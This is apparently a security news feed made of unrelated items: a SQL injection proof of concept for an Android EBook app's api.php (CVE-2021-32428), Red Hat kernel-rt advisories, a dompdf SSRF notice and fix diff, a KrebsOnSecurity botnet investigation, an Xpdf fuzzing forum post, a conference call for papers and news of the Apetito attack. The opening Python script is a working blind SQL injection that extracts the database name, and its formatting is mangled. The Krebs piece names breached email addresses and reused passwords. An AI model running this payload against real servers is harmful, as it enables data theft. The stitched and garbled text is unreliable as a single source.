SQL Injection vulnerability in viaviwebtech Android EBook App (Books App, PDF, ePub, Online Book Reading, Download Books) 10 via the author_id parameter to api.php.

\[+\] Title: Android EBook App (Books App, PDF, ePub, Online Book Reading, Download Books) \[+\] Author: veyselxan \[+\] Vendor Homepage:https://codecanyon.net/user/viaviwebtech \[+\] Tested on: Windows 10 \[+\] Versions: 10 \[+\] Vulnerability Type: SQL injection \[+\] Vulnerable Parameter: "author\_id" \[+\] Vulnerable File: api.php \[+\] Cve:CVE-2021-32428 SQL Injection vulnerability in viaviwebtech Android EBook App (Books App, PDF, ePub, Online Book Reading, Download Books) 10 via the author\_id parameter to api.php. # PoC: #!/usr/bin/python3 import requests >> import sys import string url = sys.argv\[1\]+"api.php" >> listler = list() def exploit(xa,i): database = {'data': >> '{"package\_name" : >> "com.example.test","salt":"123456","sign":"7cbf2e8809bf2f671470469ec252acea","method\_name":"get\_author\_details","author\_id":"1\\' >> AND substring(database(),'+str(i)+',1)=\\''+str(xa)+'\\'-- >> veyselxan"}'} x = requests.post(url, data = database) a = >> x.json() if a\['status'\]==1: listler.append(xa) i = 1 >> yazilara = list(string.ascii\_lowercase) while i < 16: for x >> in yazilara: exploit(x,i) i += 1 print(\*listler, sep = "")

CVE-2021-32428

Red Hat Security Advisory 2022-5344-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include buffer overflow and out of bounds read vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2022:5344-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5344  
Issue date:        2022-06-28  
CVE Names:         CVE-2020-28915 CVE-2022-27666  
====================================================================  
1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Real Time (v. 8) - x86_64  
Red Hat Enterprise Linux Real Time for NFV (v. 8) - x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: buffer overflow in IPsec ESP transformation code (CVE-2022-27666)

* kernel: out-of-bounds read in fbcon_get_font function (CVE-2020-28915)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* kernel-rt: update RT source tree to the latest RHEL-8.6.z0 Batch  
(BZ#2081704)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

1899177 - CVE-2020-28915 kernel: out-of-bounds read in fbcon_get_font function  
2061633 - CVE-2022-27666 kernel: buffer overflow in IPsec ESP transformation code

6. Package List:

Red Hat Enterprise Linux Real Time for NFV (v. 8):

Source:  
kernel-rt-4.18.0-372.13.1.rt7.170.el8_6.src.rpm

x86_64:  
kernel-rt-4.18.0-372.13.1.rt7.170.el8_6.x86_64.rpm  
kernel-rt-core-4.18.0-372.13.1.rt7.170.el8_6.x86_64.rpm  
kernel-rt-debug-4.18.0-372.13.1.rt7.170.el8_6.x86_64.rpm  
kernel-rt-debug-core-4.18.0-372.13.1.rt7.170.el8_6.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-372.13.1.rt7.170.el8_6.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-372.13.1.rt7.170.el8_6.x86_64.rpm  
kernel-rt-debug-kvm-4.18.0-372.13.1.rt7.170.el8_6.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-372.13.1.rt7.170.el8_6.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-372.13.1.rt7.170.el8_6.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-372.13.1.rt7.170.el8_6.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-372.13.1.rt7.170.el8_6.x86_64.rpm  
kernel-rt-devel-4.18.0-372.13.1.rt7.170.el8_6.x86_64.rpm  
kernel-rt-kvm-4.18.0-372.13.1.rt7.170.el8_6.x86_64.rpm  
kernel-rt-modules-4.18.0-372.13.1.rt7.170.el8_6.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-372.13.1.rt7.170.el8_6.x86_64.rpm

Red Hat Enterprise Linux Real Time (v. 8):

Source:  
kernel-rt-4.18.0-372.13.1.rt7.170.el8_6.src.rpm

x86_64:  
kernel-rt-4.18.0-372.13.1.rt7.170.el8_6.x86_64.rpm  
kernel-rt-core-4.18.0-372.13.1.rt7.170.el8_6.x86_64.rpm  
kernel-rt-debug-4.18.0-372.13.1.rt7.170.el8_6.x86_64.rpm  
kernel-rt-debug-core-4.18.0-372.13.1.rt7.170.el8_6.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-372.13.1.rt7.170.el8_6.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-372.13.1.rt7.170.el8_6.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-372.13.1.rt7.170.el8_6.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-372.13.1.rt7.170.el8_6.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-372.13.1.rt7.170.el8_6.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-372.13.1.rt7.170.el8_6.x86_64.rpm  
kernel-rt-devel-4.18.0-372.13.1.rt7.170.el8_6.x86_64.rpm  
kernel-rt-modules-4.18.0-372.13.1.rt7.170.el8_6.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-372.13.1.rt7.170.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2020-28915  
https://access.redhat.com/security/cve/CVE-2022-27666  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYrtJ5dzjgjWX9erEAQjLuQ//RTFa25s0NkMzXnXy+rZcNVr9EQI/hcM7  
t+ECJecRFQqXOYCKFRl8ZKs+LF5x3G0AVZqjw8KCduF/sxLWxzeav+xt0O4wf37c  
+XS3RbWfvCQgASpfimyc0lmijbSAug9KN60eQ+C5WJ997FSshGNucANW+cNwoVGA  
MPzAnBfSnv5cdIHBudV8CcrhdMwdpoHu+fAftNr6JSGEq3mrsyQlF0JQFNLFEZA7  
GIt0XSvPDfWT4NniYbnM3q/qXEGZh4Y8+vYJMJJ3nGKd1DDeo/dPFdhagABCLXnt  
qZ8p4PqL8v5j9F9Gzdv7E0D5b/YIT7N+U5tN/iAz0vMeXrNevBS230bU8NI82Hmo  
HNxcyXKjq+MDmMCQL6AMV0Y4cjWPB7Y8T/R1qvKuMAf4+v2sKQhBGKYNviFauFl8  
VHVT5WI7hqeVbU70SBx87fSGPeJXBFIECpgR14G3h2QeZnzswuBvXNNSOGgyZe87  
vWcwfJWFlo3W7F/219RBK6XHViqWStbnHOj49v4HCSLOje/fPOv8Ot4s04+b6TX6  
n3BJlERgcyWQmA+XuvwBZ7ekDR1ujpUMHiUvTmdUhaO/Tj5G2IJfqGreJLjydutZ  
h1Z0XUZ+Eo53nE+hbPknqoFA2Kmt3pZBgpwk6VxbBVjkd337sNelvsmwDMjPlF3R  
OpWsav5LD2U=JaXM  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5344-01

Server-Side Request Forgery (SSRF) in GitHub repository dompdf/dompdf prior to 2.0.0.

**Server-Side Request Forgery in dompdf/dompdf**

Low severity GitHub Reviewed Published Jun 29, 2022 • Updated Jul 5, 2022

GHSA-pf6p-25r2-fx45: Server-Side Request Forgery in dompdf/dompdf 

Silverstripe silverstripe/assets through 1.10 allows XSS.

CVE-2022-29858: Security Releases

On December 7, 2021, Google announced it had sued two Russian men allegedly responsible for operating the Glupteba botnet, a global malware menace that has infected millions of computers over the past decade. That same day, AWM Proxy -- a 14-year-old anonymity service that rents hacked PCs to cybercriminals -- suddenly went offline. Security experts had long seen a link between Glupteba and AWM Proxy, but new research shows AWM Proxy's founder is one of the men being sued by Google.

On December 7, 2021, **Google** announced it was suing two Russian men allegedly responsible for operating the **Glupteba** botnet, a global malware menace that has infected millions of computers over the past decade. That same day, **AWM Proxy** — a 14-year-old anonymity service that rents hacked PCs to cybercriminals — suddenly went offline. Security experts had long seen a link between Glupteba and AWM Proxy, but new research shows AWM Proxy’s founder is one of the men being sued by Google.

AWMproxy, the storefront for renting access to infected PCs, circa 2011.

Launched in March 2008, AWM Proxy quickly became the largest service for crooks seeking to route their malicious Web traffic through compromised devices. In 2011, researchers at **Kaspersky Lab** showed that virtually all of the hacked systems for rent at AWM Proxy had been compromised by **TDSS** (a.k.a TDL-4 and Alureon), a stealthy “rootkit” that installs deep within infected PCs and loads even before the underlying Windows operating system boots up.

In March 2011, security researchers at **ESET** found TDSS was being used to deploy Glupteba, another rootkit that steals passwords and other access credentials, disables security software, and tries to compromise other devices on the victim’s network — such as Internet routers and media storage servers — for use in relaying spam or other malicious traffic.

A report from the Polish computer emergency response team (CERT Orange Polksa) found Glupteba was by far the biggest malware threat in 2021.

Like its predecessor TDSS, Glupteba is primarily distributed through “pay-per-install” or PPI networks, and via traffic purchased from traffic distribution systems (TDS). Pay-per-install networks try to match cybercriminals who already have access to large numbers of hacked PCs with other crooks seeking broader distribution of their malware.

In a typical PPI network, clients will submit their malware—a spambot or password-stealing Trojan, for example —to the service, which in turn charges per thousand successful installations, with the price depending on the requested geographic location of the desired victims. One of the most common ways PPI affiliates generate revenue is by secretly bundling the PPI network’s installer with pirated software titles that are widely available for download via the web or from file-sharing networks.

An example of a cracked software download site distributing Glupteba. Image: Google.com.

Over the past decade, both Glupteba and AWM Proxy have grown substantially. When KrebsOnSecurity first covered AWM Proxy in 2011, the service was selling access to roughly 24,000 infected PCs scattered across dozens of countries. Ten years later, AWM Proxy was offering 10 times that number of hacked systems on any given day, and Glupteba had grown to more than one million infected devices worldwide.

There is also ample evidence to suggest that Glupteba may have spawned **Meris**, a massive botnet of hacked Internet of Things (IoT) devices that surfaced in September 2021 and was responsible for some of the largest and most disruptive distributed denial-of-service (DDoS) attacks the Internet has ever seen.

But on Dec. 7, 2021, Google announced it had taken technical measures to dismantle the Glupteba botnet, and filed a civil lawsuit (PDF) against two Russian men thought to be responsible for operating the vast crime machine. AWM Proxy’s online storefront disappeared that same day.

AWM Proxy quickly alerted its customers that the service had moved to a new domain, with all customer balances, passwords and purchase histories seamlessly ported over to the new home. However, subsequent takedowns targeting AWM Proxy’s domains and other infrastructure have conspired to keep the service on the ropes and frequently switching domains ever since.

Earlier this month, the United States, Germany, the Netherlands and the U.K. dismantled the “**RSOCKS**” botnet, a competing proxy service that had been in operation since 2014. KrebsOnSecurity has identified the owner of RSOCKS as a 35-year-old from Omsk, Russia who runs the world’s largest forum catering to spammers.

The employees who kept things running for RSOCKS, circa 2016.

Shortly after last week’s story on the RSOCKS founder, I heard from **Riley Kilmer**, co-founder of Spur.us, a startup that tracks criminal proxy services. Kilmer said RSOCKS was similarly disabled after Google’s combined legal sneak attack and technical takedown targeting Glupteba.

“The RSOCKS website gave you the estimated number of proxies in each of their subscription packages, and that number went down to zero on Dec. 7,” Kilmer said. “It’s not clear if that means the services were operated by the same people, or if they were just using the same sources (i.e., PPI programs) to generate new installations of their malware.”

Kilmer said each time his company tried to determine how many systems RSOCKS had for sale, they found each Internet address being sold by RSOCKS was also present in AWM Proxy’s network. In addition, Kilmer said, the application programming interfaces (APIs) used by both services to keep track of infected systems were virtually identical, once again suggesting strong collaboration.

“One hundred percent of the IPs we got back from RSOCKS we’d already identified in AWM,” Kilmer said. “And the IP port combinations they give you when you access an individual IP were the same as from AWM.”

In 2011, KrebsOnSecurity published an investigation that identified one of the founders of AWM Proxy, but Kilmer’s revelation prompted me to take a fresh look at the origins of this sprawling cybercriminal enterprise to determine if there were additional clues showing more concrete links between RSOCKS, AWM Proxy and Glupteba.

**IF YOUR PLAN IS TO RIP OFF GOOGLE…**

Supporting Kilmer’s theory that AWM Proxy and RSOCKS may simply be using the same PPI networks to spread, further research shows the RSOCKS owner also had an ownership stake in **AD1\[.\]ru**, an extremely popular Russian-language pay-per-install network that has been in operation for at least a decade.

Google took aim at Glupteba in part because its owners were using the botnet to divert and steal vast sums in online advertising revenue. So it’s more than a little ironic that the critical piece of evidence linking all of these operations begins with a Google Analytics code included in the HTML code for the original AWM Proxy back in 2008 (**UA-3816536**).

That analytics code also was present on a handful of other sites over the years, including the now-defunct Russian domain name registrar **Domenadom\[.\]ru**, and the website **web-site\[.\]ru**, which curiously was a Russian company operating a global real estate appraisal business called American Appraisal.

Two other domains connected to that Google Analytics code — Russian plastics manufacturers **techplast\[.\]ru** and **tekhplast.ru** — also shared a different Google Analytics code (**UA-1838317**) with web-site\[.\]ru and with the domain “**starovikov\[.\]ru**.”

The name on the WHOIS registration records for the plastics domains is an “**Alexander I. Ukraincki**,” whose personal information also is included in the domains tpos\[.\]ru and alphadisplay\[.\]ru, both apparently manufacturers of point-of-sale payment terminals in Russia.

Constella Intelligence, a security firm that indexes passwords and other personal information exposed in past data breaches, revealed dozens of variations on email addresses used by Alexander I. Ukraincki over the years. Most of those email addresses start with some variation of “**uai@**” followed by a domain from one of the many Russian email providers (e.g., yandex.ru, mail.ru). \[Full disclosure: Constella is currently an advertiser on this website\].

But Constella also shows those different email addresses all relied on a handful of passwords — most commonly “**2222den**” and “**2222DEN**.” Both of those passwords have been used almost exclusively in the past decade by the person who registered more than a dozen email addresses with the username “**dennstr**.”

The dennstr identity leads to several variations on the same name — Denis Strelinikov, or Denis Stranatka, from Ukraine, but those clues ultimately led nowhere promising. And maybe that was the point.

Things began looking brighter after I ran a search in DomainTools for web-site\[.\]ru’s original WHOIS records, which shows it was assigned in 2005 to a “private person” who used the email address **lycefer@gmail.com**. A search in Constella on that email address says it was used to register nearly two dozen domains, including starovikov.ru and **starovikov\[.\]com**.

A cached copy of the contact page for Starovikov\[.\]com shows that in 2008 it displayed the personal information for a **Dmitry Starovikov**, who listed his Skype username as “lycefer.”

Finally, Russian incorporation documents show the company LLC Website (web-site\[.\]ru)was registered in 2005 to two men, one of whom was named **Dmitry Sergeevich Starovikov**.

Bringing this full circle, Google says Starovikov is one of the two operators of the Glupteba botnet:

The cover page for Google’s lawsuit against the alleged Glupteba botnet operators.

Mr. Starovikov did not respond to requests for comment. But attorneys for Starovikov and his co-defendant last month filed a response to Google’s complaint in the Southern District of New York, denying (PDF) their clients had any knowledge of the scheme.

Despite all of the disruption caused by Google’s legal and technical meddling, AWM is still around and nearly as healthy as ever, although the service has been branded with a new name and there are dubious claims of new owners. Advertising customer plans ranging from $50 a day to nearly $700 for “VIP access,” AWM Proxy says its malware has been running on approximately 175,000 systems worldwide over the last 24 hours, and that roughly 65,000 of these systems are currently online.

AWM Proxy, as it exists today.

Meanwhile, the administrators of RSOCKS recently alerted customers that the service and any unspent balances will soon be migrated over to a new location.

Many people seem to equate spending time, money and effort to investigate and prosecute cybercriminals with the largely failed war on drugs, meaning there is an endless supply of up-and-coming crooks who will always fill in any gaps in the workforce whenever cybercriminals face justice.

While that may be true for many low-level cyber thieves today, investigations like these show once again how small the cybercriminal underground really is. It also shows how it makes a great deal of sense to focus efforts on targeting and disrupting the relatively small number of established hackers who remain the real force multipliers of cybercrime.

The Link Between AWM Proxy & the Glupteba Botnet

XPDF v4.04 was discovered to contain a stack overflow vulnerability via the Object::Copy class of object.cc files.

Post Reply

*   Print view

Advanced search

2 posts • Page **1** of **1**

H00K1998

**Posts:** 5

**Joined:** Sat Jun 04, 2022 8:14 am

**There seems to be a stack overflow vulnerability here, can you take a look, source code：Object::copy**

*   Quote

Post by **H00K1998** » Sat Jun 04, 2022 8:24 am

Hello, I seem to encounter a stack overflow vulnerability in the process of fuzz test (afl++), can you take a look

Enjoy:)

Attachments

poc-images.7z

(188.3 KiB) Downloaded 4 times

Top

derekn

**Posts:** 757

**Joined:** Wed Apr 05, 2017 6:57 pm

**Re: There seems to be a stack overflow vulnerability here, can you take a look, source code：Object::copy**

*   Quote

Post by **derekn** » Thu Jun 09, 2022 7:58 pm

That's due to an object loop in the PDF file. I'm planning to implement a more robust loop checker in Xpdf 5.

Top

Post Reply

*   Print view

Display: Sort by: Direction:

2 posts • Page **1** of **1**

Return to “Xpdf open source”

Jump to

*   XpdfReader
*   Xpdf open source

CVE-2022-33108: There seems to be a stack overflow vulnerability here, can you take a look, source code：Object::copy

The No cON Name 2022 call for papers has been announced. It will be held in Barcelona, Spain, from November 24th through the 26th, 2022.

    No cON Name 2022 - Barcelona*****************************************  Call For Papers        ******************************************https://www.noconname.org/call-for-papers/Exact place not disclosed until a few weeks before due celebration.     * INTRODUCTIONThe organization has  opened CFP proposals. No cON Name is the eldest Hackingand Security Conference in Span. Our goal is to get highly qualified requestsfor both, speaker opportunities, as well as workshops, to show in one of  themost  respected hacker conferences in  Barcelona and Spain, NcN (No cONName). We will cellebrate as the last edition, 2 tracks:     * Privacy and net neutrality Track. (November 24th)     * Cybersecurity Track (November 25-26th)We will be accepting exclusively technical  presentations, proof of concept for,private  investigations  and  solutions  for  professionals related  to the  ITsecurity scene. Under no circumstance we will be selecting any proposal which iscommercially targeted, our main goal is to share knowledge in a well-establishedcommunity.     * FORMAT & REQUIREMENTS   - Language: English ( We will choose almost 75% ) or Spanish   - Proposal file type: PDF. It must follow  documentations requirements, shown     in next paragraph, and filled in through the web site   - Please use the template provided for the presentations during the conference   - It's necessary to  deeply explain contents, as this document will allow the     organization to evaluate the proposal.   - CFP's attachment  requested is mandatory. One page  summary of the contents,     or the investigations that you want to show will help to demonstrate techni-     cally the findings/result of investigations (additional texts,  screenshots,     evidences, code, etc)     WE DON'T ACCEPT PROPOSALS PRESENTED IN SPAIN BEFORE THE NOCONNAME'S CONGRESS DATE.In the event  that the  proposal  is accepted, it must be submitted  before thedeadline (September 1st, detailed in the important dates section below):   - An  article (a  template  in doc, odt  format  is  attached.) that  will  be     delivered in the conferences notebook. MANDATORY   - Presentation and exhibition  material: september the 15th. All the material     that will be  presented to the organization  must be delivered, otherwise it     will be possible to  grant other applicants your place. You have to plan the     day of the event nimbly. MANDATORY     * CONTENTSWe will require the following info to review your CFP:DATA                         DESCRIPTIONPreferred contact method     Alias, email, twitter account, Facebook,etc.  Name & Surname*  Alias *  Email *  Phone nº *  Twitter id  City/Country of residence *Proposal  Proposal type *             Speaking presentation or Workshop presentation  Representing *              Individual or company name  Category *                  See: RELEVANT TOPICS  Length (minutes) *          Speaker (presentation): Between  20 or 45 minutes.                              Workshop (presentation + demo):  45 minutes                              or 1,5 hours.  Title of the paper *:       Presentation's / Workshops Title  Goal *                      State  your objectives  during your investigation,                              issues encountered, impact on the society including                              risks.  Benefits *                  List  the   benefits  your presentation  will  be                              providing to the security community, social impact,                              and perhaps solutions to the current issue.  Description *               Presentation's / Workshop's description  Speaker's Biography *       Brief bio of latest published papers, previous talk                              experience, your current interests.     * RELEVANT TOPICSThe areas of interest that have been proposed, not restricted to, are:   - Offensive security.   - Evading / In-depth research of Phishing / Malware.   - Security & exploiting SCADA / ICS.   - Internet privacy and net neutrality (EPIC).   - Honeypots / Honeynets.   - Web explorers' security.   - Hardware hacking.   -  New vulnerabilities and 0-day exploits.   - Healthcare sucurity / risks   - (in)Security in the automotive industry   - Software Testing/Fuzzing.   - Advanced Penetration testing techniques.   - Mobile Application Security-Threats and Exploits.   - Network and Router Hacking   - Mobile, Satellite, IP networks security   - SDR (Software defined radio)   - Hacking virtualized envirorments   - Computer/electronic forensics   - Bluetooth vulnerabilities.   - Videconference application vulnerabilities.   - Covid-19 App vulnerabilities     * DEADLINES   - CFP Requests closing: September 15th 2022.   - CFP Approval: September, 25th 2022.   - Materials presentation due: October, 1st  2022   - Conference's date: November, 24,25,26th 2022     * SENDING YOUR CFPAll requests must be submitted through our site at:   https://www.noconname.org/call-for-papers/Fill in the form  and upload necessary files and you are  all set (some parts of website are in sspanish)     - EVALUATION CRITERIA FOR PROPOSALSWe will be evaluating speaking  conference and workshop requests with the follo-wing score:   - Level  of  innovation  in  your  investigation / Sophistication  of the  40%     presentation   - Stating your key-points of your proposal without going deep into detail  20%   - Briefing quality of your draft (proof of concept in  briefing is highly  15%     appreciated)   - State  field where your investigation  was made, ie:hardware, software,  10%     industry.   - Your speaking reputation                                                 10%   - Relevant topic proposed by the No cON Name staff               5%

No cON Name 2022 Barcelona Call For Papers

Red Hat Security Advisory 2022-5236-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include privilege escalation and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2022:5236-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5236  
Issue date:        2022-06-28  
CVE Names:         CVE-2022-1729 CVE-2022-1966   
=====================================================================

1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux for Real Time (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux for Real Time for NFV (v. 7) - noarch, x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: race condition in perf_event_open leads to privilege escalation  
(CVE-2022-1729)

* kernel: a use-after-free write in the netfilter subsystem can lead to  
privilege escalation to root (CVE-2022-1966)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* kernel-rt: update to the latest RHEL7.9.z15 source tree (BZ#2081074)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2086753 - CVE-2022-1729 kernel: race condition in perf_event_open leads to privilege escalation  
2092427 - CVE-2022-1966 kernel: a use-after-free write in the netfilter subsystem can lead to privilege escalation to root

6. Package List:

Red Hat Enterprise Linux for Real Time for NFV (v. 7):

Source:  
kernel-rt-3.10.0-1160.71.1.rt56.1212.el7.src.rpm

noarch:  
kernel-rt-doc-3.10.0-1160.71.1.rt56.1212.el7.noarch.rpm

x86_64:  
kernel-rt-3.10.0-1160.71.1.rt56.1212.el7.x86_64.rpm  
kernel-rt-debug-3.10.0-1160.71.1.rt56.1212.el7.x86_64.rpm  
kernel-rt-debug-debuginfo-3.10.0-1160.71.1.rt56.1212.el7.x86_64.rpm  
kernel-rt-debug-devel-3.10.0-1160.71.1.rt56.1212.el7.x86_64.rpm  
kernel-rt-debug-kvm-3.10.0-1160.71.1.rt56.1212.el7.x86_64.rpm  
kernel-rt-debug-kvm-debuginfo-3.10.0-1160.71.1.rt56.1212.el7.x86_64.rpm  
kernel-rt-debuginfo-3.10.0-1160.71.1.rt56.1212.el7.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-3.10.0-1160.71.1.rt56.1212.el7.x86_64.rpm  
kernel-rt-devel-3.10.0-1160.71.1.rt56.1212.el7.x86_64.rpm  
kernel-rt-kvm-3.10.0-1160.71.1.rt56.1212.el7.x86_64.rpm  
kernel-rt-kvm-debuginfo-3.10.0-1160.71.1.rt56.1212.el7.x86_64.rpm  
kernel-rt-trace-3.10.0-1160.71.1.rt56.1212.el7.x86_64.rpm  
kernel-rt-trace-debuginfo-3.10.0-1160.71.1.rt56.1212.el7.x86_64.rpm  
kernel-rt-trace-devel-3.10.0-1160.71.1.rt56.1212.el7.x86_64.rpm  
kernel-rt-trace-kvm-3.10.0-1160.71.1.rt56.1212.el7.x86_64.rpm  
kernel-rt-trace-kvm-debuginfo-3.10.0-1160.71.1.rt56.1212.el7.x86_64.rpm

Red Hat Enterprise Linux for Real Time (v. 7):

Source:  
kernel-rt-3.10.0-1160.71.1.rt56.1212.el7.src.rpm

noarch:  
kernel-rt-doc-3.10.0-1160.71.1.rt56.1212.el7.noarch.rpm

x86_64:  
kernel-rt-3.10.0-1160.71.1.rt56.1212.el7.x86_64.rpm  
kernel-rt-debug-3.10.0-1160.71.1.rt56.1212.el7.x86_64.rpm  
kernel-rt-debug-debuginfo-3.10.0-1160.71.1.rt56.1212.el7.x86_64.rpm  
kernel-rt-debug-devel-3.10.0-1160.71.1.rt56.1212.el7.x86_64.rpm  
kernel-rt-debuginfo-3.10.0-1160.71.1.rt56.1212.el7.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-3.10.0-1160.71.1.rt56.1212.el7.x86_64.rpm  
kernel-rt-devel-3.10.0-1160.71.1.rt56.1212.el7.x86_64.rpm  
kernel-rt-trace-3.10.0-1160.71.1.rt56.1212.el7.x86_64.rpm  
kernel-rt-trace-debuginfo-3.10.0-1160.71.1.rt56.1212.el7.x86_64.rpm  
kernel-rt-trace-devel-3.10.0-1160.71.1.rt56.1212.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1729  
https://access.redhat.com/security/cve/CVE-2022-1966  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYrr1h9zjgjWX9erEAQgoug//X+2272c6fT57aJDp7fTx1jWR/C1btEgx  
1ntHeoWo63OEPOTEBBvzumm8Snc3ha3Si5rLUED4jFqrZF2x4tL5ysPdZVzmEhKb  
TbRs6qvO4DaC8DRiPDlCMRjTyr6LALFkukVZnNp27pdfIQaPAZT2rw5vqM9eBxaP  
ujhlJHF+UhxhjczV5maDObvtqv9tXw4aAcCSwLJ3G7DjIIjclYZVCZyQ2vutMR2v  
mdUcCYJ0FpT5AdgyqJAytVHBg3SuqocWECvcgo81v5OyVRpJSPISr8QJ9A7ArRmP  
Opgc9eGp0VUZST/YEn5moJohXQ3CP7A7plg9HUjo6wSqMjaoYuA6O55htGP4cMu0  
q2fnnrhQNDTqmMr3mdtnvJegzDbgkm4BiGUagpzu8KzCiDuQICWtKpD7yR5nWeeU  
8rCy4gG2umSyy3YIbYQBUw1dpDyQGZEx1rkCb7E9Q+dY6V+kfY9VOdayL9lwKjDB  
hiXCR4CJI7VhAUx8vBZJjjDKuZsPps/C/qgFnuAozXi9zseeCvi8oaqwAfFOlWN1  
9yJjElvhMj8/KZBK+sILO/mBjyTzZWrWseMkqgoULpmKwDjx5JsyOyfGiPbsEfnm  
IA1ytujJQbZLDODOIsx+9RqH20eMylVIzkVaNte1nBZoHJwY525CNMZmirnF9zHu  
SsJW0x6Eodc=  
=ZYzg  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5236-01

@@ -298,6 +298,18 @@ public function \_\_construct(array $attributes = null)

$this\->setFontDir($rootDir . "/lib/fonts");

$this\->setFontCache($this\->getFontDir());

  

$ver = "";

$versionFile = realpath(\_\_DIR\_\_ . "/../VERSION");

if (file\_exists($versionFile) && ($version = trim(file\_get\_contents($versionFile))) !== false && $version !== '$Format:<%h>$') {

$ver = "/$version";

}

$this\->setHttpContext(\[

"http" => \[

"follow\_location" => false,

"user\_agent" => "Dompdf$ver https://github.com/dompdf/dompdf"

\]

\]);

  

if (null !== $attributes) {

$this\->set($attributes);

}

CVE-2022-0085: Add a default context · dompdf/dompdf@bb1ef65

‘Manual workaround’ kickstarts phased recovery after cybercrooks disrupt meal provision to vulnerable people

‘Manual workaround’ kickstarts phased recovery after cybercrooks disrupt meal provision to vulnerable people

Deliveries of prepared meals to thousands of vulnerable people in England continue to be disrupted following a “sophisticated” cyber-attack on food distributor Apetito.

Apetito’s impacted UK arm delivers ready meals to hospitals, care homes, schools, childcare facilities, and the homes of vulnerable people across the west of England.

In an update (PDF) posted to its website yesterday (June 27), Paul Freeston, chair and CEO of Apetito UK and North America, reiterated that the firm would be unable to fulfill deliveries until and including Thursday June 30 following the cyber-attack over the weekend.

He advised customers with “deliveries on these days to make contingency plans”.

Freeston added that “a limited number of test deliveries from a manual system will be made tomorrow”, and if successful, “we hope to extend \[this system\] further this week”.

**Emergency procedures**

Freeston said on Sunday that the company had activated “emergency procedures” to ensure “most” customers of meals on wheels (home-delivered hot food) should still receive a meal – “although it may not be the meal they chose”.

Apetito subsidiary Wiltshire Farm Foods, which delivers frozen ready meals to the homes of mostly vulnerable people, usually seniors, managed to make “a limited number of local deliveries” yesterday using “a manual work-around system” that would “continue this week”.

Read more of the latest cyber-attack news

